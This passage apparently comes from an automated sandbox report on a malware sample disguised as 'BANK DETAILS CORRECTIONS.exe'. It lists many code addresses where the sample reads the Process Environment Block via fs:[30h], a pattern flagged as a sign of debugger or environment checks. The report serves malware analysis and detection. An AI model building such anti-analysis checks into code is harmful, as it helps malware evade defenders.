                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019C4180 mov eax, dword ptr fs:[00000030h]12_2_019C4180
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0199E1D0 mov eax, dword ptr fs:[00000030h]12_2_0199E1D0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0199E1D0 mov eax, dword ptr fs:[00000030h]12_2_0199E1D0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0199E1D0 mov ecx, dword ptr fs:[00000030h]12_2_0199E1D0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0199E1D0 mov eax, dword ptr fs:[00000030h]12_2_0199E1D0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0199E1D0 mov eax, dword ptr fs:[00000030h]12_2_0199E1D0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019E61C3 mov eax, dword ptr fs:[00000030h]12_2_019E61C3
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019E61C3 mov eax, dword ptr fs:[00000030h]12_2_019E61C3
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019501F8 mov eax, dword ptr fs:[00000030h]12_2_019501F8
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019F61E5 mov eax, dword ptr fs:[00000030h]12_2_019F61E5
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019CA118 mov ecx, dword ptr fs:[00000030h]12_2_019CA118
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019CA118 mov eax, dword ptr fs:[00000030h]12_2_019CA118
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019CA118 mov eax, dword ptr fs:[00000030h]12_2_019CA118
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019CA118 mov eax, dword ptr fs:[00000030h]12_2_019CA118
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019E0115 mov eax, dword ptr fs:[00000030h]12_2_019E0115
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019CE10E mov eax, dword ptr fs:[00000030h]12_2_019CE10E
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019CE10E mov ecx, dword ptr fs:[00000030h]12_2_019CE10E
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019CE10E mov eax, dword ptr fs:[00000030h]12_2_019CE10E
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019CE10E mov eax, dword ptr fs:[00000030h]12_2_019CE10E
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019CE10E mov ecx, dword ptr fs:[00000030h]12_2_019CE10E
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019CE10E mov eax, dword ptr fs:[00000030h]12_2_019CE10E
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019CE10E mov eax, dword ptr fs:[00000030h]12_2_019CE10E
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019CE10E mov ecx, dword ptr fs:[00000030h]12_2_019CE10E
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019CE10E mov eax, dword ptr fs:[00000030h]12_2_019CE10E
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019CE10E mov ecx, dword ptr fs:[00000030h]12_2_019CE10E
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01950124 mov eax, dword ptr fs:[00000030h]12_2_01950124
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019B8158 mov eax, dword ptr fs:[00000030h]12_2_019B8158
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01926154 mov eax, dword ptr fs:[00000030h]12_2_01926154
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01926154 mov eax, dword ptr fs:[00000030h]12_2_01926154
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0191C156 mov eax, dword ptr fs:[00000030h]12_2_0191C156
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019B4144 mov eax, dword ptr fs:[00000030h]12_2_019B4144
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019B4144 mov eax, dword ptr fs:[00000030h]12_2_019B4144
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019B4144 mov ecx, dword ptr fs:[00000030h]12_2_019B4144
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019B4144 mov eax, dword ptr fs:[00000030h]12_2_019B4144
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019B4144 mov eax, dword ptr fs:[00000030h]12_2_019B4144
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0192208A mov eax, dword ptr fs:[00000030h]12_2_0192208A
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019E60B8 mov eax, dword ptr fs:[00000030h]12_2_019E60B8
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019E60B8 mov ecx, dword ptr fs:[00000030h]12_2_019E60B8
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019B80A8 mov eax, dword ptr fs:[00000030h]12_2_019B80A8
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019A20DE mov eax, dword ptr fs:[00000030h]12_2_019A20DE
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0191C0F0 mov eax, dword ptr fs:[00000030h]12_2_0191C0F0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019620F0 mov ecx, dword ptr fs:[00000030h]12_2_019620F0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0191A0E3 mov ecx, dword ptr fs:[00000030h]12_2_0191A0E3
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019A60E0 mov eax, dword ptr fs:[00000030h]12_2_019A60E0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019280E9 mov eax, dword ptr fs:[00000030h]12_2_019280E9
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0193E016 mov eax, dword ptr fs:[00000030h]12_2_0193E016
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0193E016 mov eax, dword ptr fs:[00000030h]12_2_0193E016
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0193E016 mov eax, dword ptr fs:[00000030h]12_2_0193E016
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0193E016 mov eax, dword ptr fs:[00000030h]12_2_0193E016
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019A4000 mov ecx, dword ptr fs:[00000030h]12_2_019A4000
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019C2000 mov eax, dword ptr fs:[00000030h]12_2_019C2000
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019C2000 mov eax, dword ptr fs:[00000030h]12_2_019C2000
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019C2000 mov eax, dword ptr fs:[00000030h]12_2_019C2000
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019C2000 mov eax, dword ptr fs:[00000030h]12_2_019C2000
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019C2000 mov eax, dword ptr fs:[00000030h]12_2_019C2000
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019C2000 mov eax, dword ptr fs:[00000030h]12_2_019C2000
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019C2000 mov eax, dword ptr fs:[00000030h]12_2_019C2000
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019C2000 mov eax, dword ptr fs:[00000030h]12_2_019C2000
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019B6030 mov eax, dword ptr fs:[00000030h]12_2_019B6030
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0191A020 mov eax, dword ptr fs:[00000030h]12_2_0191A020
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0191C020 mov eax, dword ptr fs:[00000030h]12_2_0191C020
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01922050 mov eax, dword ptr fs:[00000030h]12_2_01922050
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019A6050 mov eax, dword ptr fs:[00000030h]12_2_019A6050
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0194C073 mov eax, dword ptr fs:[00000030h]12_2_0194C073
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01918397 mov eax, dword ptr fs:[00000030h]12_2_01918397
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01918397 mov eax, dword ptr fs:[00000030h]12_2_01918397
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01918397 mov eax, dword ptr fs:[00000030h]12_2_01918397
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0191E388 mov eax, dword ptr fs:[00000030h]12_2_0191E388
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0191E388 mov eax, dword ptr fs:[00000030h]12_2_0191E388
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0191E388 mov eax, dword ptr fs:[00000030h]12_2_0191E388
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0194438F mov eax, dword ptr fs:[00000030h]12_2_0194438F
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0194438F mov eax, dword ptr fs:[00000030h]12_2_0194438F
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019CE3DB mov eax, dword ptr fs:[00000030h]12_2_019CE3DB
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019CE3DB mov eax, dword ptr fs:[00000030h]12_2_019CE3DB
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019CE3DB mov ecx, dword ptr fs:[00000030h]12_2_019CE3DB
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019CE3DB mov eax, dword ptr fs:[00000030h]12_2_019CE3DB
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019C43D4 mov eax, dword ptr fs:[00000030h]12_2_019C43D4
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019C43D4 mov eax, dword ptr fs:[00000030h]12_2_019C43D4
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019DC3CD mov eax, dword ptr fs:[00000030h]12_2_019DC3CD
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0192A3C0 mov eax, dword ptr fs:[00000030h]12_2_0192A3C0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0192A3C0 mov eax, dword ptr fs:[00000030h]12_2_0192A3C0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0192A3C0 mov eax, dword ptr fs:[00000030h]12_2_0192A3C0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0192A3C0 mov eax, dword ptr fs:[00000030h]12_2_0192A3C0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0192A3C0 mov eax, dword ptr fs:[00000030h]12_2_0192A3C0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0192A3C0 mov eax, dword ptr fs:[00000030h]12_2_0192A3C0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019283C0 mov eax, dword ptr fs:[00000030h]12_2_019283C0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019283C0 mov eax, dword ptr fs:[00000030h]12_2_019283C0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019283C0 mov eax, dword ptr fs:[00000030h]12_2_019283C0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019283C0 mov eax, dword ptr fs:[00000030h]12_2_019283C0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0193E3F0 mov eax, dword ptr fs:[00000030h]12_2_0193E3F0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0193E3F0 mov eax, dword ptr fs:[00000030h]12_2_0193E3F0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0193E3F0 mov eax, dword ptr fs:[00000030h]12_2_0193E3F0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019563FF mov eax, dword ptr fs:[00000030h]12_2_019563FF
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019303E9 mov eax, dword ptr fs:[00000030h]12_2_019303E9
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019303E9 mov eax, dword ptr fs:[00000030h]12_2_019303E9
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019303E9 mov eax, dword ptr fs:[00000030h]12_2_019303E9
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019303E9 mov eax, dword ptr fs:[00000030h]12_2_019303E9
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019303E9 mov eax, dword ptr fs:[00000030h]12_2_019303E9
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019303E9 mov eax, dword ptr fs:[00000030h]12_2_019303E9
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019303E9 mov eax, dword ptr fs:[00000030h]12_2_019303E9
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019303E9 mov eax, dword ptr fs:[00000030h]12_2_019303E9
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0191C310 mov ecx, dword ptr fs:[00000030h]12_2_0191C310
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01940310 mov ecx, dword ptr fs:[00000030h]12_2_01940310
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0195A30B mov eax, dword ptr fs:[00000030h]12_2_0195A30B
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0195A30B mov eax, dword ptr fs:[00000030h]12_2_0195A30B
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0195A30B mov eax, dword ptr fs:[00000030h]12_2_0195A30B
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019A035C mov eax, dword ptr fs:[00000030h]12_2_019A035C
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019A035C mov eax, dword ptr fs:[00000030h]12_2_019A035C
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019A035C mov eax, dword ptr fs:[00000030h]12_2_019A035C
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019A035C mov ecx, dword ptr fs:[00000030h]12_2_019A035C
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019A035C mov eax, dword ptr fs:[00000030h]12_2_019A035C
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019A035C mov eax, dword ptr fs:[00000030h]12_2_019A035C
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019EA352 mov eax, dword ptr fs:[00000030h]12_2_019EA352
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019C8350 mov ecx, dword ptr fs:[00000030h]12_2_019C8350
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019A2349 mov eax, dword ptr fs:[00000030h]12_2_019A2349
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019A2349 mov eax, dword ptr fs:[00000030h]12_2_019A2349
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019A2349 mov eax, dword ptr fs:[00000030h]12_2_019A2349
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019A2349 mov eax, dword ptr fs:[00000030h]12_2_019A2349
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019A2349 mov eax, dword ptr fs:[00000030h]12_2_019A2349
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019A2349 mov eax, dword ptr fs:[00000030h]12_2_019A2349
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019A2349 mov eax, dword ptr fs:[00000030h]12_2_019A2349
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019A2349 mov eax, dword ptr fs:[00000030h]12_2_019A2349
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019A2349 mov eax, dword ptr fs:[00000030h]12_2_019A2349
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019A2349 mov eax, dword ptr fs:[00000030h]12_2_019A2349
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019A2349 mov eax, dword ptr fs:[00000030h]12_2_019A2349
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019A2349 mov eax, dword ptr fs:[00000030h]12_2_019A2349
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019A2349 mov eax, dword ptr fs:[00000030h]12_2_019A2349
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019A2349 mov eax, dword ptr fs:[00000030h]12_2_019A2349
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019A2349 mov eax, dword ptr fs:[00000030h]12_2_019A2349
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019C437C mov eax, dword ptr fs:[00000030h]12_2_019C437C
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0195E284 mov eax, dword ptr fs:[00000030h]12_2_0195E284
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0195E284 mov eax, dword ptr fs:[00000030h]12_2_0195E284
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019A0283 mov eax, dword ptr fs:[00000030h]12_2_019A0283
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019A0283 mov eax, dword ptr fs:[00000030h]12_2_019A0283
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019A0283 mov eax, dword ptr fs:[00000030h]12_2_019A0283
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019302A0 mov eax, dword ptr fs:[00000030h]12_2_019302A0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019302A0 mov eax, dword ptr fs:[00000030h]12_2_019302A0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019B62A0 mov eax, dword ptr fs:[00000030h]12_2_019B62A0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019B62A0 mov ecx, dword ptr fs:[00000030h]12_2_019B62A0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019B62A0 mov eax, dword ptr fs:[00000030h]12_2_019B62A0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019B62A0 mov eax, dword ptr fs:[00000030h]12_2_019B62A0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019B62A0 mov eax, dword ptr fs:[00000030h]12_2_019B62A0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019B62A0 mov eax, dword ptr fs:[00000030h]12_2_019B62A0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0192A2C3 mov eax, dword ptr fs:[00000030h]12_2_0192A2C3
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0192A2C3 mov eax, dword ptr fs:[00000030h]12_2_0192A2C3
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0192A2C3 mov eax, dword ptr fs:[00000030h]12_2_0192A2C3
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0192A2C3 mov eax, dword ptr fs:[00000030h]12_2_0192A2C3
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0192A2C3 mov eax, dword ptr fs:[00000030h]12_2_0192A2C3
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019302E1 mov eax, dword ptr fs:[00000030h]12_2_019302E1
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019302E1 mov eax, dword ptr fs:[00000030h]12_2_019302E1
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019302E1 mov eax, dword ptr fs:[00000030h]12_2_019302E1
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0191823B mov eax, dword ptr fs:[00000030h]12_2_0191823B
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0191A250 mov eax, dword ptr fs:[00000030h]12_2_0191A250
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01926259 mov eax, dword ptr fs:[00000030h]12_2_01926259
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019DA250 mov eax, dword ptr fs:[00000030h]12_2_019DA250
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019DA250 mov eax, dword ptr fs:[00000030h]12_2_019DA250
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019A8243 mov eax, dword ptr fs:[00000030h]12_2_019A8243
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019A8243 mov ecx, dword ptr fs:[00000030h]12_2_019A8243
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019D0274 mov eax, dword ptr fs:[00000030h]12_2_019D0274
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019D0274 mov eax, dword ptr fs:[00000030h]12_2_019D0274
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019D0274 mov eax, dword ptr fs:[00000030h]12_2_019D0274
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019D0274 mov eax, dword ptr fs:[00000030h]12_2_019D0274
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019D0274 mov eax, dword ptr fs:[00000030h]12_2_019D0274
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019D0274 mov eax, dword ptr fs:[00000030h]12_2_019D0274
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019D0274 mov eax, dword ptr fs:[00000030h]12_2_019D0274
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019D0274 mov eax, dword ptr fs:[00000030h]12_2_019D0274
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019D0274 mov eax, dword ptr fs:[00000030h]12_2_019D0274
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019D0274 mov eax, dword ptr fs:[00000030h]12_2_019D0274
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019D0274 mov eax, dword ptr fs:[00000030h]12_2_019D0274
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019D0274 mov eax, dword ptr fs:[00000030h]12_2_019D0274
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01924260 mov eax, dword ptr fs:[00000030h]12_2_01924260
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01924260 mov eax, dword ptr fs:[00000030h]12_2_01924260
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01924260 mov eax, dword ptr fs:[00000030h]12_2_01924260
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0191826B mov eax, dword ptr fs:[00000030h]12_2_0191826B
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0195E59C mov eax, dword ptr fs:[00000030h]12_2_0195E59C
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01922582 mov eax, dword ptr fs:[00000030h]12_2_01922582
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01922582 mov ecx, dword ptr fs:[00000030h]12_2_01922582
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01954588 mov eax, dword ptr fs:[00000030h]12_2_01954588
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019445B1 mov eax, dword ptr fs:[00000030h]12_2_019445B1
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019445B1 mov eax, dword ptr fs:[00000030h]12_2_019445B1
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019A05A7 mov eax, dword ptr fs:[00000030h]12_2_019A05A7
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019A05A7 mov eax, dword ptr fs:[00000030h]12_2_019A05A7
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019A05A7 mov eax, dword ptr fs:[00000030h]12_2_019A05A7
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019265D0 mov eax, dword ptr fs:[00000030h]12_2_019265D0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0195A5D0 mov eax, dword ptr fs:[00000030h]12_2_0195A5D0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0195A5D0 mov eax, dword ptr fs:[00000030h]12_2_0195A5D0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0195E5CF mov eax, dword ptr fs:[00000030h]12_2_0195E5CF
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0195E5CF mov eax, dword ptr fs:[00000030h]12_2_0195E5CF
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019225E0 mov eax, dword ptr fs:[00000030h]12_2_019225E0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0194E5E7 mov eax, dword ptr fs:[00000030h]12_2_0194E5E7
